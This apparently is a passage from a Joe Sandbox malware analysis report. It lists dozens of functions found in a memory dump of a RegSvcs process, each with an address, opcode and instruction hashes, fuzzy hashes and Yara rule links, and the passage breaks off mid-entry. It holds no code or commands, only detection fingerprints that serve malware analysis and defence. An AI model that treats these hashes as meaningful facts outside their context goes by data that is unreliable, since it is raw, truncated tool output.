                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                          • Instruction ID: cc84a51569c74af78b3cdc932acfa131618cbef13af52d849cd1fd4677af6ce2
                                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                          • Instruction Fuzzy Hash: AD217C726016C1DFE7339F89C540A6ABBE6FB94B10F15887EE94A8B614C730EC01CB40
                                                                          Function 014E80E9 Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9db9ee43ad7250e642ee1a9364671dc3657567dca1abad202cf4915aa7f0d6b5
                                                                          • Instruction ID: 0577579720845138d64e2c4fce4619b416d13c7376285c8a7cd402854dc6130f
                                                                          • Opcode Fuzzy Hash: 9db9ee43ad7250e642ee1a9364671dc3657567dca1abad202cf4915aa7f0d6b5
                                                                          • Instruction Fuzzy Hash: 12214975A4020ADFCB14CF98C581AAAFBF5FB88319F24416ED105AB325CB71ED06CB90
                                                                          Function 0151674D Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e22142602fd0a63014a80a765425059ac499c19ab9eb92736b7515c7b619c3ca
                                                                          • Instruction ID: 3280c83fddc34908b9a58d7a2d528dfa06d05f9ef05a99d5ada8dbb9d497c02d
                                                                          • Opcode Fuzzy Hash: e22142602fd0a63014a80a765425059ac499c19ab9eb92736b7515c7b619c3ca
                                                                          • Instruction Fuzzy Hash: B8216075601A41EFE7318F69C841F66B7F8FF44250F44882DE5AACB651DBB0B850CB60
                                                                          Function 01576870 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 889e75300c644937c827cfc774fab96415b5e217da39926f8e81c4d7607a1ffb
                                                                          • Instruction ID: 217f3dcb49358d6f777613ba621ea73134d7dc7cd2cf06f48767491cbc775af1
                                                                          • Opcode Fuzzy Hash: 889e75300c644937c827cfc774fab96415b5e217da39926f8e81c4d7607a1ffb
                                                                          • Instruction Fuzzy Hash: B811C432240915EFE722DB59E941F9A77E8FB95750F114029F205DF260D770DD05C7A0
                                                                          Function 0150E8C0 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb83ba8c66944ea5bf9b13d8a1576951f055939d8728d8b757877ef92f673b63
                                                                          • Instruction ID: 3339a8ce72041499d160fdc550a64e0595122f33220769f89f4d519f3ce873bb
                                                                          • Opcode Fuzzy Hash: eb83ba8c66944ea5bf9b13d8a1576951f055939d8728d8b757877ef92f673b63
                                                                          • Instruction Fuzzy Hash: 4411E5323041159FCB1BDB6DCC81A6F7296FBD5374B354D29E9228F390EA309802C790
                                                                          Function 015166B0 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 409669bb1c46aa99837be2cf5c32535f549c636b5ce43a4abd4dfb77f1c58b1b
                                                                          • Instruction ID: 5b3ac744942fbf336c361e44eb8cb17f26d66d7a400bdb10e75d5978f62df173
                                                                          • Opcode Fuzzy Hash: 409669bb1c46aa99837be2cf5c32535f549c636b5ce43a4abd4dfb77f1c58b1b
                                                                          • Instruction Fuzzy Hash: 1F11CE76A02205DFDB26CF59C580E5ABBF8BF94650B02407EDA159F318E6B0DD00CB90
                                                                          Function 015AA8E4 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction ID: 27ff0c874cf9aa084a5f1aa404d85ecf3988055613daf9c963f061641054937b
                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction Fuzzy Hash: 47110436A0091AAFDB19CB58C811B9DBBF5FFC4310F058269E8459B340E771ED01CB80
                                                                          Function 014E0AD0 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction ID: 8f201ebc93e97540349b423a65de2e879e91b5a9fb238f86245fa5ccf976fad0
                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction Fuzzy Hash: 592106B5A00B059FD3A0CF29D440B52BBF4FB48B20F10492EE98ACBB50E371E814CB90
                                                                          Function 0156E7E1 Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction ID: 6cc43a95b3df8043b3ebeee37476a04c97c09f41e4761d402e5f590fe06f64a1
                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction Fuzzy Hash: 7411BF39602601EBE721DF49C846B5A7BE9FB51754F05842DEA089F160D730DC41CBD0
                                                                          Function 015027ED Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 83f1adcb38d8879fb6da4734371211ec992de46dcbc65b8db55ead902af1a008
                                                                          • Instruction ID: d89c0dc8cfa575800e476f6f3972727c07d04bb731b07d79c10bae4c2a792059
                                                                          • Opcode Fuzzy Hash: 83f1adcb38d8879fb6da4734371211ec992de46dcbc65b8db55ead902af1a008
                                                                          • Instruction Fuzzy Hash: 6201D676685645ABF327A6AED848F2B6BDCFF90358F050469FA018F291D974DC00C2B1
                                                                          Function 014E4690 Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8aa5c28073a18dbcd51a9fcd5c8247f123577abeba5ff87c4071b81ae9eaa99d
                                                                          • Instruction ID: 2b28e136126060a4154e4d9ac8e887c19989eadd7271b75d910eae4629541952
                                                                          • Opcode Fuzzy Hash: 8aa5c28073a18dbcd51a9fcd5c8247f123577abeba5ff87c4071b81ae9eaa99d
                                                                          • Instruction Fuzzy Hash: B511E3752846419FD721CF59D888B577BE4EB95B65F18411BF904CB760C330E800CFA0
                                                                          Function 01516620 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 53f63b01cefad8a79818a02348de7e5e26bfa9a7ce54dad1692c31782c0db06f
                                                                          • Instruction ID: 147bc4fdeb9ade0eff2bc868e0a966c53f9b5d4e878406cbaa2d1b5db5dedf09
                                                                          • Opcode Fuzzy Hash: 53f63b01cefad8a79818a02348de7e5e26bfa9a7ce54dad1692c31782c0db06f
                                                                          • Instruction Fuzzy Hash: 21118276A00616ABEB22DF59C980B5EFBB8FF94751F510859DA01AF214D770AD01CB50
                                                                          Function 0150EA2E Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73c95b518e0a550d23fed264f301dcf6c45147a986077281215cd34be5446989
                                                                          • Instruction ID: 39cd876668da5edd4c8e14fb9247569d095b5268de259a364779062c7af7d1fc
                                                                          • Opcode Fuzzy Hash: 73c95b518e0a550d23fed264f301dcf6c45147a986077281215cd34be5446989
                                                                          • Instruction Fuzzy Hash: F601D27161110A9FC726DB19D509F16BBF9FB95314F21856AE1048F2A0D7B09C86CB90
                                                                          Function 0150E53E Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction ID: 77ec095a863974f417d7d452ec4614b78db108a2199de29ea1cc0c638bb6f2ff
                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction Fuzzy Hash: 2311CE722016C29BE7239B6D8A54B2D7BD4FB0174CF2908A6DA419F7D2F339C842C260
                                                                          Function 0156E75D Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction ID: f7c41fd2e1918ad63414ae659b60cecfaab73fe94c8df9d31aaad03df86960ae
                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction Fuzzy Hash: 6901223A202146AFEB21DF19C802F5A7AEDFF90B50F058429EA04AF260E779DD40C7D0
                                                                          Function 014DA250 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction ID: 788054605cfff3d7bc9ae511e6bde0459ebef653a58f3dc248270a6185d35516
                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction Fuzzy Hash: F1010032504B229BCF218F1A9840A237BA4EB55B607108A2EF9958B7A1C331D801CBA0
                                                                          Function 0155E1D0 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f2dc96ccf8c4659f8f5e2746856ef6699f9dd7d78a15384e79ca927883aba96
                                                                          • Instruction ID: 1581cbeb36429356b762979e01a177537724a213fd708f05fedd59937bb0576f
                                                                          • Opcode Fuzzy Hash: 8f2dc96ccf8c4659f8f5e2746856ef6699f9dd7d78a15384e79ca927883aba96
                                                                          • Instruction Fuzzy Hash: F5118E36241241EFDB25EF19C991F16BBB8FF94B84F10046AE9059F6A1C635ED01CA90
                                                                          Function 014E6259 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f240cf8195fbb8013cd805474e9db5cdcb5bc4513a6d301a699f3a3e5cc7078d
                                                                          • Instruction ID: 1b6d5791005f858d38ac389d3787dacafa3a945a723249476898dd46ac5a94ba
                                                                          • Opcode Fuzzy Hash: f240cf8195fbb8013cd805474e9db5cdcb5bc4513a6d301a699f3a3e5cc7078d
                                                                          • Instruction Fuzzy Hash: 58119A7154122AABEB25AB24CC52FE9B2B4BB58710F504195A318AA1E0DA309E81CF84
                                                                          Function 01566050 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee729418cf06e1d6d328b7ec07018d49db873471fdc1dc47b0a33f3139bce886
                                                                          • Instruction ID: c34aaf59612a83fc2ff6aeb9c59ac08cf6b0eb7042462bf89cfb3d05fa9a38d4
                                                                          • Opcode Fuzzy Hash: ee729418cf06e1d6d328b7ec07018d49db873471fdc1dc47b0a33f3139bce886
                                                                          • Instruction Fuzzy Hash: 3F111773900019ABCB12DB94CC80DDFBBBCFF58258F044166E916EB211EA34AA15CBE0
                                                                          Function 014E208A Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction ID: f797871fbcd8702f498fca9cd76b70d2f21d785e8e0dc2944f789d57eb669adc
                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction Fuzzy Hash: DD0128B26001019BEF158E5DD884F967BABBFC4700F1544ABEE418F3A6DAB1CC81C390
                                                                          Function 01576500 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4a551bcb51d56a35914d5622a11dce0ea048cae3c0614fe35af151397e525bb
                                                                          • Instruction ID: 262048dc24f19b040feeca1cb4429304f943a7f2d2e4f4ff4ca08122e042835f
                                                                          • Opcode Fuzzy Hash: b4a551bcb51d56a35914d5622a11dce0ea048cae3c0614fe35af151397e525bb
                                                                          • Instruction Fuzzy Hash: A01104326005469FE311CF28E840BA6BBF9FB5A314F488159E848CF315D732EC80DBA0
                                                                          Function 0156C810 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 177c426d6b2c52bf07d1810ec9ce97a405eb687d5082286e0425e0f1d7d6654f
                                                                          • Instruction ID: 75914f10f9ba6e5269c8535267ad9b4e68bb033deeea3f9e9647a04bd3cc421b
                                                                          • Opcode Fuzzy Hash: 177c426d6b2c52bf07d1810ec9ce97a405eb687d5082286e0425e0f1d7d6654f
                                                                          • Instruction Fuzzy Hash: E91118B1E0021A9BCB14DFA9D541AAEBBF8FF58350F10406AE905EB351D674EA01CBA4
                                                                          Function 0158EA60 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: df74cf37370c01a8bdfb9e0df53442967a26d1a0f264d6917c1ed0a7e8e1f884
                                                                          • Instruction ID: de617f60bcab4a60c0493e4ed2401de59d243f1b3bd2896bf413fac500bfe773
                                                                          • Opcode Fuzzy Hash: df74cf37370c01a8bdfb9e0df53442967a26d1a0f264d6917c1ed0a7e8e1f884
                                                                          • Instruction Fuzzy Hash: 510171315412119BCB32BB1A8449D7AFBB9FF61A50B05482EE6556F721CBB0DC41CB91
                                                                          Function 014DC020 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction ID: d171b9f4ee4762ed331540e5fb67cd868891470e89648d71b5f6a17314c35524
                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction Fuzzy Hash: FE01B5721007069FEF2396AAC844AA777F9FFD6250F44481EA6568F690DA70E402C760
                                                                          Function 015220F0 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 004c01e5a2d8c5a75fdac84705bde0b83bd7f736b6e7d40bbe2d56ff74ffd872
                                                                          • Instruction ID: 63cdefd3e73293c94adf11b4aa8d57bac43ff6dca687d8f68400e9849bb0dcb5
                                                                          • Opcode Fuzzy Hash: 004c01e5a2d8c5a75fdac84705bde0b83bd7f736b6e7d40bbe2d56ff74ffd872
                                                                          • Instruction Fuzzy Hash: E5116D36A0125DAFDB15DF64C850EAE7BB5FB85340F104059E9119B290DB35AE11CB90
                                                                          Function 0151E5CF Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1e9ce5d61babd8fa8c3c3824d2fde51eb54c46a739b61b70a4e90832d1ce5d6d
                                                                          • Instruction ID: 7853f22584a18e0d20c7a15da182701c71df54d6003010d8c8de40fd5e16bb80
                                                                          • Opcode Fuzzy Hash: 1e9ce5d61babd8fa8c3c3824d2fde51eb54c46a739b61b70a4e90832d1ce5d6d
                                                                          • Instruction Fuzzy Hash: 4A01D472200542BBD312AB6ACD40E17B7ECFBA4694701052EB60587661DB74EC01C6E0
                                                                          Function 015769C0 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 972216b31c1172a9a9324f9af1a05616b3cd632235d43412671e08cf06a9c01d
                                                                          • Instruction ID: d39fad7427a6db03893a5e37d5e716e635bfe51e5d0b94d9e023e500b19779ae
                                                                          • Opcode Fuzzy Hash: 972216b31c1172a9a9324f9af1a05616b3cd632235d43412671e08cf06a9c01d
                                                                          • Instruction Fuzzy Hash: 6C014C32224612DFD324EF6ED849D6BBBE8FF98620F114529E9688F2C0E7309905C7D1
                                                                          Function 0156C460 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5125d107d6e2e8e0d36a1a09b0981b4b0b4195bc9ea038fc84c45bc27870a45
                                                                          • Instruction ID: 3c2fc9bddb1f65fc4b4498311868b08a01f2f4b2f060993053f18da5a9364da0
                                                                          • Opcode Fuzzy Hash: b5125d107d6e2e8e0d36a1a09b0981b4b0b4195bc9ea038fc84c45bc27870a45
                                                                          • Instruction Fuzzy Hash: 1B116D71A0120DEBDB15EF68C844EAE7BB9FB99350F004059FD419B390DA35E911DB90
                                                                          Function 0156C97C Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 63f361439ca7917d9b4191e41da781c7a90da9b82df23c6deb58eb38bc92051d
                                                                          • Instruction ID: 56a61367095901e1ab75c5ec805409bc39f001bab1030e7a681057194b77f97d
                                                                          • Opcode Fuzzy Hash: 63f361439ca7917d9b4191e41da781c7a90da9b82df23c6deb58eb38bc92051d
                                                                          • Instruction Fuzzy Hash: D21139B26193099FC710DF69D44195BBBE8FF99710F00491EFA98DB391E634E901CBA2
                                                                          Function 0156CA11 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f8822ffbfd8c211f980370a089c724f4e9ac58ca4d4226bf87475df5b493eb6
                                                                          • Instruction ID: ffe062805f70453a8c1dd650f0903f42230cbe5b191150a7edf5fa22ca7fa601
                                                                          • Opcode Fuzzy Hash: 8f8822ffbfd8c211f980370a089c724f4e9ac58ca4d4226bf87475df5b493eb6
                                                                          • Instruction Fuzzy Hash: 27117C716043059FC310DF69C44194BBBE8FF99350F00451EF998DB3A0E670E900CBA2
                                                                          Function 015B4A80 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                          • Instruction ID: 3d22d61aacd4cd0a69fd30101ba7b89bb811820db63c7d27f03ab36e8c16f87d
                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                          • Instruction Fuzzy Hash: 7601D832200A029FD731DA99D885FDAB7EBFBC5210F044819E643CF651DAB0F841C754
                                                                          Function 014FE016 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
